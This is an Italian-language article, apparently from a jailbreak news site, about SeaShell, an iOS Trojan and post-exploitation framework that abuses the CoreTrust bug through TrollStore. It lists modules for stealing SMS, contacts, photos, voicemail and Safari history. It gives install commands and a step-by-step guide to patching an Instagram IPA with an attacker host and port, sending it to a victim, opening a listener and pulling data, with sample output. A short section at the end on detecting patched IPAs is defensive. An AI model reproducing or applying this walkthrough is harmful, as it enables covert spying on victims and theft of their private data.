Cavallo di Troia SeaShell per iOS
Molti utenti percepiscono il bug CoreTrust, utilizzato dal programma di installazione IPA di TrollStore, come una comoda funzione che facilita l'installazione di app e tweak in modo permanente e senza vincoli da qualsiasi fonte su iPhone con iOS 14, iOS 15 e iOS 16. Tuttavia, il bug ha un potenziale oscuro perché può essere sfruttato per prendere il controllo del tuo iPhone clandestinamente, consentendo di spiare il tuo dispositivo in modo surrettizio e a tua insaputa. Tuttavia, nasconde un potenziale oscuro perché può essere sfruttato per prendere il controllo del tuo iPhone in modo clandestino, consentendo di spiare il tuo dispositivo a tua insaputa.
Cos'è SeaShell?
SeaShell è un framework progettato per applicare una patch a un file IPA per TrollStore o Esign, consentendo l'iniezione di malware. Questo software maligno facilita la connettività remota al dispositivo preso di mira, trasformandolo di fatto in un cavallo di Troia sull'iPhone o sull'iPad di un'ignara vittima. Sfruttando il bug di CoreTrust, SeaShell opera in modo surrettizio, ponendo rischi significativi per la sicurezza degli utenti. L'IPA patchato deve essere installato con TrollStore o TrollStore 2.
Il framework di post-exploitation per iOS noto come SeaShell consente agli utenti di accedere da remoto, manipolare ed estrarre dati da dispositivi mirati. Grazie alla sua architettura versatile, gli utenti possono sviluppare facilmente moduli personalizzati per compiti specifici. Tuttavia, SeaShell viene fornito con diversi moduli essenziali progettati per estrarre informazioni sensibili senza problemi. Inoltre, è possibile applicare una patch all'IPA con Trojan Horse.
Per avviare il processo, è sufficiente generare un file IPA modificato, che può essere installato sul dispositivo di destinazione attraverso canali come TrollStore o qualsiasi altro programma di installazione IPA in grado di aggirare le restrizioni di CoreTrust. Una volta che l'applicazione è stata installata con successo, l'obiettivo deve semplicemente lanciarla una volta e poi può chiuderla.
Tra le sue funzionalità, SeaShell offre moduli per l'estrazione di dati critici. Ad esempio, gli utenti possono utilizzare un modulo per recuperare informazioni dettagliate sui contatti memorizzate nel file AddressBook.sqlitedb. Inoltre, gli utenti possono visualizzare le informazioni di sistema come il dispositivo e il firmware iOS installato e scaricare le foto accessibili sul dispositivo o su iCloud.
Inoltre, SeaShell facilita l'esplorazione dei segnalibri di Safari e della cronologia di navigazione, consentendo agli utenti di approfondire l'impronta digitale del dispositivo in questione. Questa funzione consente di estrarre e memorizzare i dati di navigazione in un comodo formato JSON da analizzare.
Inoltre, il framework include moduli dedicati all'accesso ai dati della Voicemail dal file voicemail.db, offrendo approfondimenti sui modelli di comunicazione e sulle interazioni. Inoltre, SeaShell offre la funzionalità di scaricare o visualizzare i dati degli SMS, consentendo agli utenti di monitorare e analizzare gli scambi di messaggi di testo, rivelando così potenzialmente preziose intuizioni o prove.
In sintesi, SeaShell non solo offre una piattaforma flessibile per lo sviluppo di moduli personalizzati, ma include anche una serie di strumenti precostituiti per l'estrazione di informazioni sensibili dai dispositivi iOS.
Nota: SeaShell richiede agli utenti di scaricare un file IPA modificato, caricarlo sul dispositivo con TrollStore ed eseguirlo almeno una volta per compromettere il dispositivo.
Questa suite completa di funzionalità sottolinea l'efficacia del framework negli scenari di post-exploitation, evidenziando il suo potenziale per scopi sia legittimi che malevoli.
SeaShell vanta una capacità immensamente potente: la possibilità di agganciarsi a varie applicazioni, tra cui Contacts.app. Grazie a questa funzionalità, gli utenti ottengono un controllo senza precedenti, consentendo loro di sostituire le app di sistema, di entrare nei container delle app, di aggiungere nuovi processi, di applicare patch agli eseguibili, di modificare i permessi degli eseguibili, di caricare patch e altro ancora. Esiste anche un'opzione integrata per controllare il player della vittima con opzioni come stop, play, next, ecc.
Questa funzione permette agli utenti di spostare il Cavallo di Troia per iOS in diverse app, comprese quelle di sistema come Calcolatrice, Contatti, ecc.
Il potenziale di sfruttamento non conosce limiti: SeaShell offre un'ampia gamma di vie per attacchi e manipolazioni sofisticate. SeaShell sfrutta le formidabili capacità di un payload avanzato noto come Pwny, famoso per la sua pletora di funzioni progettate per facilitare intricate tattiche di sfruttamento. Con Pwny al centro, SeaShell offre agli utenti una struttura solida per eseguire manovre sofisticate nel campo della sicurezza informatica.
Come installare SeaShell
SeaShell è uno script Python comodamente installabile tramite il gestore di pacchetti pip. Per configurare il framework SeaShell, basta inserire il seguente comando nel terminale:
pip3 install git+https://github.com/EntySec/SeaShell
Pwny è un'implementazione di un payload avanzato scritto in puro C e progettato per la portabilità e l'estensibilità per i dispositivi iOS. Usa il seguente comando per installare pwny:
pip3 install git+https://github.com/EntySec/HatSploitCome usare il framework SeaShell
SeaShell utilizza il suo pacchetto di applicazioni che comprende un semplice eseguibile e un altro eseguibile responsabile dell'avvio del payload di Pwny. Questo strumento consente agli utenti di modificare qualsiasi file IPA, ad esempio inserendo un IPA di Instagram modificato con il cavallo di Troia. Esiste anche un'opzione per creare un file IPA contenente il malware con un nome e un'icona falsi.
Passo 1. Apri l'applicazione terminale ed esegui il comando seashell per eseguire il framework.
seashellPasso 2. Crea un file IPA e fornisci il tuo IP e la tua porta per la connessione.
(seashell)> ipa patch Instagram.ipa Host da riconnettere: 192.168.0.1 Porta da riconnettere: 8888 IPA di Instagram.ipa patchato.Passo 3. Invia l'IPA alla vittima per l'installazione tramite TrollStore.
Passo 4. Apri il listener sul tuo computer e attendi la connessione.
(seashell)> listener su 0.0.0.0:8888Passo 5. Dopo l'avvenuta connessione, esegui i moduli come safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts ecc.
pwny:/ root# sms 123456789
sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s
sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s
[*] Parsing SMS for 123456789...
Sms (11111111111):
ID Date Status Text
-- ---- ------ ----
1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com
pwny:/ root#Per garantire l'accesso ai dati degli SMS puoi elencare le chat presenti nell'app SMS utilizzando il comando sms -l, oppure estrarre la cronologia delle chat con un contatto specifico con sms .
pwny:/ root# sms 123456789
sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s
sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s
[*] Parsing SMS for 123456789...
Sms (11111111111):
ID Date Status Text
-- ---- ------ ----
1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com
pwny:/ root#Come individuare il cavallo di Troia SeaShell
Per ridurre il rischio di cadere vittima di attacchi tramite il framework SeaShell, puoi seguire alcuni suggerimenti su come rilevare la configurazione predefinita dei file IPA con patch di SeaShell. Tuttavia, il progetto è open-sourced e può essere facilmente modificato per cambiare i valori con altri personalizzati.
- Decomprimi il file IPA che intendi installare.
- Ispeziona il bundle dell'applicazione per trovare un eseguibile chiamato "mussel", che serve a rappresentare il payload di Pwny.
- Esamina il file Info.plist e cerca "CFBundleBase64Hash", che contiene una coppia di host codificata con base64 (:).
- Verifica la somma dell'hash del file per assicurarti della sua integrità prima di procedere con l'installazione.
